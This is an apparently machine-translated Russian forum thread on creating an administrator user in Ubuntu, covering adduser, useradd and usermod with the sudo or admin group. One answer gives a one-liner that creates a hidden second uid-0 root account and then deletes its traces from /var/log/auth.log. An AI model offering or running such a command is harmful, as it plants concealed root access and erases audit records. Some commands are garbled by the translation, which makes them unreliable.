Как я могу создать пользователя-администратора из командной строки?

Я хочу создать пользователя с правами администратора и всеми обычными настройками, такими как домашний каталог.

  1. Есть ли adduser параметр, который нужно предоставить пользователю sudo включается автоматически?
  2. Каковы настройки по умолчанию для adduser? Будет ли он автоматически создавать домашние каталоги и все остальное без дополнительных параметров? (т.е. является adduser <username> достаточно?)

Добавьте пользователя в sudo группа с:

adduser <username> sudo

(Если вы используете Ubuntu 11.10 или более раннюю версию, используйте admin группа.)

Значения по умолчанию хранятся в /etc/adduser.conf, вы можете проверить их с помощью

less /etc/adduser.conf

Чтобы создать пользователя и добавить его непосредственно в sudo групповое использование

adduser <username> --group sudo

(Опять же, используйте admin на месте sudo для 11.10 и более ранних версий.)

Взгляните на все варианты, которые у вас есть с adduser здесь.

Чтобы создать нового пользователя с правами администратора в Ubuntu 12.04 и более поздних версиях:

adduser <username> --ingroup sudo

В Ubuntu 11.10 и более ранних версиях используйте это вместо:

adduser <username> --group admin

Чтобы изменить существующего пользователя (12.04 и более поздние версии):

adduser <username> --group sudo

или

sudo usermod -aG sudo <username>

(Или для 11.10 и более ранних версий: sudo usermod -aG admin <username>)

-a расшифровывается как добавление, тогда как -G обозначает группы. С -a и -G флаги, как показано выше, sudo (или admin) группа будет добавлен к списку групп, членом которых является пользователь.

Другие ответы верны, но вы также спрашивали о домашнем каталоге. Вам также понадобится пароль для нового пользователя.

sudo useradd *new-admin-username* -s /bin/bash -g sudo -m
  • -s задает оболочку входа пользователя
  • -m создает домашний каталог пользователя, если он не существует:/home/*new-admin-username*
  • -g> добавляет пользователя в группу sudo, чтобы у него были права администратора (11.10)

После создания добавьте пароль для пользователя:

sudo passwd *new-admin-username*

Войдите в систему пользователя, чтобы посмотреть, все ли работает:

su *new-admin-username*cd ~/pwd

Вот один лайнер, он создает нового пользователя root. Вы должны изменить некоторые параметры.

  USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment   Here" && sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid   0 --non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;'   /var/log/auth.log

Лучший,

вы должны использовать useradd для нового пользователя, а не adduser.

@JizoSaves Вообще говоря, это зависит от обстоятельств. adduser более интерактивен, а useradd предназначен для сценариев.